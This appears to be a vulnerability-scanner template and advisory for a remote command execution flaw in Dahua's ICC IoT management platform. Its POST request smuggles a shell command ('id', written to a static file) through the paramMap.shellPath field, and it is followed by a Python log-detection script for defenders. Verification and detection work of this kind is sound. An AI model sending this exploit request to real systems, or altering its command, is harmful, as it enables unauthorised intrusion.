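Vulnerability Description
The Dahua ICC Intelligent IoT Integrated Management Platform modularizes and loosely couples its technical components and organizes its solutions into layers and tiers, improving data access and ecosystem cooperation capabilities for smart IoT. The system has an arbitrary file read vulnerability that can lead to sensitive information disclosure. The evo-runs/v1.0/push and evo-runs/v1.0/receive interfaces of the Dahua intelligent IoT management platform have a remote command execution vulnerability.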
id: dahua-zhinengwulian-evo-runsv1-0push-rce
info:
  name: 大华智能物联管理平台evo-runs/v1.0/push接口存在远程命令执行漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。该系统存在任意文件读取漏洞,会造成敏感信息泄露。大华智能物联管理平台evo-runs/v1.0/push和evo-runs/v1.0/receive接口存在远程命令执行漏洞
  reference:
    - https://cn-sec.com/archives/4357593.html
  tags: dahua,rce
  created: 2025/08/18
set:
  hostname: request.url.host
  randstr: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /evo-runs/v1.0/push
      headers:
        Content-Type: application/json
        X-Subject-Headerflag: ADAPT
      body: |
        { "method": "agent.ossm.mapping.config", "info": { "configure": "abcd", "filePath": "haha", "paramMap": { "shellPath": "/bin/bash -c id>/opt/evoWpms/static/{{randstr}}.txt", "filePath": "abc" }, "requestIp": "" } }
    expression: >-
      response.status == 200 && response.raw.bcontains(b"success") && response.raw.bcontains(b"true")
  r1:
    request:
      method: GET
      path: /static/{{randstr}}.txt
    expression: >-
      response.status == 200 &&
      "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.raw)
expression: r0() && r1()
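
For defenders, the two-step pattern in the template above (a POST carrying a command in `paramMap.shellPath`, then a GET of a `.txt` file under `/static/`) can be hunted in request logs. The following is an added example, not part of the original template: the event record layout, the `detect` and `suspicious_shell_path` names, the benign `shellPath` value and the sample events are all constructed assumptions.

```python
import json
import re

# Endpoints the page names as affected.
WATCHED_PATHS = {"/evo-runs/v1.0/push", "/evo-runs/v1.0/receive"}
# Whitespace or shell metacharacters inside a value that should be a plain path.
SHELL_HINT = re.compile(r"[\s;&|<>`$()]")
STATIC_TXT = re.compile(r"^/static/[^/]+\.txt$")


def suspicious_shell_path(body):
    """Return info.paramMap.shellPath if it looks like a command, else None."""
    try:
        doc = json.loads(body)
        value = doc["info"]["paramMap"]["shellPath"]
    except (ValueError, KeyError, TypeError):
        return None
    return value if isinstance(value, str) and SHELL_HINT.search(value) else None


def detect(events):
    """Return (src, finding) tuples for events given in chronological order."""
    findings, flagged = [], set()
    for ev in events:
        path = ev["path"].split("?", 1)[0]
        if ev["method"] == "POST" and path in WATCHED_PATHS:
            cmd = suspicious_shell_path(ev.get("body", ""))
            if cmd is not None:
                flagged.add(ev["src"])
                findings.append((ev["src"], "command in shellPath: " + cmd))
        elif ev["method"] == "GET" and ev["src"] in flagged and STATIC_TXT.match(path):
            findings.append((ev["src"], "result fetch after push: " + path))
    return findings


# Constructed sample events (not real traffic).
SAMPLE = [
    {"src": "198.51.100.7", "method": "POST", "path": "/evo-runs/v1.0/push",
     "body": json.dumps({"method": "agent.ossm.mapping.config", "info": {"paramMap": {
         "shellPath": "/bin/bash -c id>/opt/evoWpms/static/abcdefgh.txt", "filePath": "abc"}}})},
    {"src": "198.51.100.7", "method": "GET", "path": "/static/abcdefgh.txt"},
    {"src": "203.0.113.9", "method": "POST", "path": "/evo-runs/v1.0/push",
     "body": json.dumps({"info": {"paramMap": {"shellPath": "/opt/agent/map.cfg"}}})},
    {"src": "203.0.113.9", "method": "GET", "path": "/static/logo.txt"},
]

if __name__ == "__main__":
    for src, finding in detect(SAMPLE):
        print(src, finding)
```

The GET correlation only fires for a source that already sent a flagged POST, which keeps ordinary static-file requests out of the findings.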